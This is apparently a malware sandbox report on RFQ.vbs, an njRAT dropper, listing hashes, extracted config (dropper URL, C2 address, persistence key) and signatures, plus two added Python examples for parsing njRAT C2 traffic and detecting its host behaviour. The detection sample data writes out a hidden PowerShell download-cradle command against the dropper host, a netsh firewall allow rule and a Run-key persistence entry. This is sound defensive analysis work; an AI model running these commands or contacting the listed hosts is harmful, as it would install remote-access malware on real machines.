RFQ.vbs

General

Target: RFQ.vbs
Size: 7KB
Sample: 210917-vm1cfsgac2
Score: 10/10
MD5: 344aaf64e1d6be52690b5006b4e7e407
SHA1: 7d23e39c1aefae326ec42b82bdfdcae504d2662f
SHA256: a078a2a795317c2e46fbb857f9f2cda679731bf8276f19a8d9c2fb2b3c076f27
SHA512: c2064b2c5dd9cc8ba22f9b9136e71eabcfbd16b89d8d0ec3cd7b6945d4244045ebe7fe22450728c0de5ce2278926c8444dd2a043c82471a34f9ae43932a4b8f3

Malware Config

Extracted (PowerShell dropper stage)
Language: ps1 (deobfuscated)
URLs:
  exe.dropper: http://13.112.210.240/bypass.txt

Extracted (njRAT payload)
Family: njrat
Version: 0.7d
Botnet: HacKed
C2: 103.153.78.241:7851
Attributes:
  reg_key: c111af59b6283a846969092a2400626a (value name njRAT uses for its Run-key persistence entry)
  splitter: |'|'| (field delimiter in the C2 protocol)
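The splitter and the C2 pair are the fields a network defender gets the most out of. The block below is an added example, not part of this report and not the sandbox's own tooling: it frames and splits njRAT-style C2 messages using this sample's splitter. The length-prefix framing (decimal length, NUL byte, payload), the "ll" check-in command and the base64 encoding of some check-in fields are assumptions drawn from public njRAT write-ups, not from this page, and the traffic is constructed for the example.

```python
"""Added example (not from the report): frame and split njRAT C2 traffic with this sample's splitter.

Assumptions, taken from public njRAT write-ups rather than from this page:
  * each message on the wire is  <decimal length> NUL <payload>
  * payload fields are separated by the configured splitter (|'|'| for this sample)
  * the first field is the command; the initial check-in is "ll" and some of its
    fields (e.g. the victim name) are base64-encoded
The traffic below is constructed for the example.
"""
import base64

SPLITTER = b"|'|'|"                       # from the extracted config
C2 = ("103.153.78.241", 7851)             # from the extracted config


def frame_messages(stream: bytes):
    """Yield complete payloads from a length-prefixed byte stream.
    A frame whose length field is not decimal, or whose payload is cut short
    (partial capture), ends the walk instead of raising."""
    pos = 0
    while pos < len(stream):
        nul = stream.find(b"\x00", pos)
        if nul == -1:
            break
        length_field = stream[pos:nul]
        if not length_field.isdigit():
            break
        length = int(length_field)
        payload = stream[nul + 1:nul + 1 + length]
        if len(payload) < length:
            break
        yield payload
        pos = nul + 1 + length


def parse_message(payload: bytes, splitter: bytes = SPLITTER):
    """Split one payload into (command, [field, ...])."""
    parts = payload.split(splitter)
    return parts[0].decode("ascii", "replace"), parts[1:]


def decode_field(field: bytes) -> bytes:
    """Return the base64-decoded field when it is valid base64 whose decoding is
    valid UTF-8 (njRAT encodes e.g. the victim name that way), else the raw field."""
    try:
        raw = base64.b64decode(field, validate=True)
        raw.decode("utf-8")
        return raw
    except (ValueError, UnicodeDecodeError):
        return field


def scan_stream(stream: bytes, splitter: bytes = SPLITTER):
    """Decode every complete frame in a captured TCP stream."""
    return [parse_message(p, splitter) for p in frame_messages(stream)]


def build_frame(fields):
    """Encode fields the way the implant would send them (used only to construct sample traffic)."""
    payload = SPLITTER.join(fields)
    return str(len(payload)).encode() + b"\x00" + payload


# Constructed sample: a check-in, a short command, then a truncated frame.
SAMPLE_STREAM = (
    build_frame([b"ll", base64.b64encode(b"HacKed_DESKTOP-1"), b"WIN-01", b"user"])
    + build_frame([b"inf"])
    + b"12\x00truncated"
)

if __name__ == "__main__":
    for command, fields in scan_stream(SAMPLE_STREAM):
        print(command, [decode_field(f) for f in fields])
```

Point `scan_stream` at the reassembled TCP payload of any flow to 103.153.78.241:7851; a stream that yields well-framed messages containing the splitter is a strong hit even before the commands are interpreted, and the truncation guard keeps a partial capture from blowing up the parser.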
Targets

Target: RFQ.vbs
Filesize: 7KB
Score: 10/10
MD5, SHA1, SHA256, SHA512: identical to the hashes listed under General above

Tags

Signatures

  • njRAT/Bladabindi
    Description: Widely used RAT written in .NET. The config extracted from this sample (version 0.7d, botnet "HacKed", C2 103.153.78.241:7851) is listed under Malware Config.

  • Blocklisted process makes network request
    Consistent with the extracted ps1 dropper stage fetching its next stage from http://13.112.210.240/bypass.txt.

  • Modifies Windows Firewall
    TTPs: Modify Existing Service
    njRAT is known to add a firewall allow rule for its own executable (typically via netsh), so the firewall change is expected for this family rather than a side effect.

  • Suspicious use of SetThreadContext
    Setting the thread context of another process is the usual final step of process hollowing or thread hijacking, i.e. the payload runs inside a host process rather than as the dropped file itself.
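The signatures above are behaviours a host-side detection can be checked against. The following is an added example, not part of this report, that runs a few simple rules over constructed process-creation and registry-set records: a script host spawning PowerShell, a command line carrying the dropper host from the extracted config, a Run-key value named after the extracted reg_key, and a netsh firewall allow rule. The event schema, the specific netsh command forms and the file paths are assumptions made for the example; only the dropper host and the reg_key value come from the report.

```python
"""Added example (not from the report): host-side triage of the behaviours this report flags,
run over constructed telemetry records. Only DROPPER_HOST and NJRAT_REG_KEY come from the
extracted config; the event schema, paths and command lines are assumptions."""
import re

DROPPER_HOST = "13.112.210.240"                          # from exe.dropper URL in the report
NJRAT_REG_KEY = "c111af59b6283a846969092a2400626a"       # reg_key attribute in the report

# netsh forms njRAT is known to use to whitelist its own binary (assumption from public analyses)
FIREWALL_ALLOW = re.compile(
    r"netsh(?:\.exe)?\s+(?:firewall\s+add\s+allowedprogram|advfirewall\s+firewall\s+add\s+rule)",
    re.IGNORECASE,
)
URL_RE = re.compile(r"""https?://[^\s'"]+""", re.IGNORECASE)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\\([^\\]+)$", re.IGNORECASE)


def analyse(events):
    """Return [(finding, pid), ...] for records of the constructed schema:
    {"type": "process", "pid", "image", "parent", "cmdline"}  or
    {"type": "registry", "pid", "target", "data"}."""
    findings = []
    for ev in events:
        pid = ev["pid"]
        if ev["type"] == "process":
            image = ev["image"].lower()
            parent = ev["parent"].lower()
            cmd = ev["cmdline"]
            # VBS -> PowerShell hand-off seen in this sample's dropper chain
            if parent.endswith("wscript.exe") and image.endswith("powershell.exe"):
                findings.append(("script_host_spawns_powershell", pid))
            # any URL on the command line pointing at the known dropper host
            for url in URL_RE.findall(cmd):
                if DROPPER_HOST in url:
                    findings.append(("known_dropper_url", pid))
            # firewall allow rule added from the command line
            if image.endswith("netsh.exe") and FIREWALL_ALLOW.search(cmd):
                findings.append(("firewall_allow_rule", pid))
        elif ev["type"] == "registry":
            # Run-key value whose name is the extracted reg_key
            m = RUN_KEY.search(ev["target"])
            if m and m.group(1).lower() == NJRAT_REG_KEY:
                findings.append(("njrat_run_key_persistence", pid))
    return findings


# Constructed records (not sandbox output) covering each rule plus one benign process.
EVENTS = [
    {"type": "process", "pid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Windows\System32\wscript.exe" "C:\Users\vm\Downloads\RFQ.vbs"'},
    {"type": "process", "pid": 101,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\wscript.exe",
     "cmdline": "powershell -w hidden -c \"(New-Object Net.WebClient)"
                ".DownloadString('http://13.112.210.240/bypass.txt')\""},
    {"type": "registry", "pid": 102,
     "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\c111af59b6283a846969092a2400626a",
     "data": r"C:\Users\vm\AppData\Roaming\server.exe"},
    {"type": "process", "pid": 103, "image": r"C:\Windows\System32\netsh.exe",
     "parent": r"C:\Users\vm\AppData\Roaming\server.exe",
     "cmdline": r'netsh firewall add allowedprogram "C:\Users\vm\AppData\Roaming\server.exe" "server.exe" ENABLE'},
    {"type": "process", "pid": 104, "image": r"C:\Windows\System32\svchost.exe",
     "parent": r"C:\Windows\System32\services.exe", "cmdline": "svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for finding, pid in analyse(EVENTS):
        print(f"{finding}: pid {pid}")
```

The registry rule matches on the value name rather than on a reg.exe command line because njRAT writes its Run key from inside the process; a process-creation-only feed would miss it, which is why the example takes registry-set records as a separate event type.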

Related Tasks

MITRE ATT&CK Matrix
Tactic columns: Collection, Command and Control, Credential Access, Defense Evasion, Execution, Exfiltration, Impact, Initial Access, Lateral Movement, Privilege Escalation

Tasks
static1
behavioral1: 10/10
behavioral2: 10/10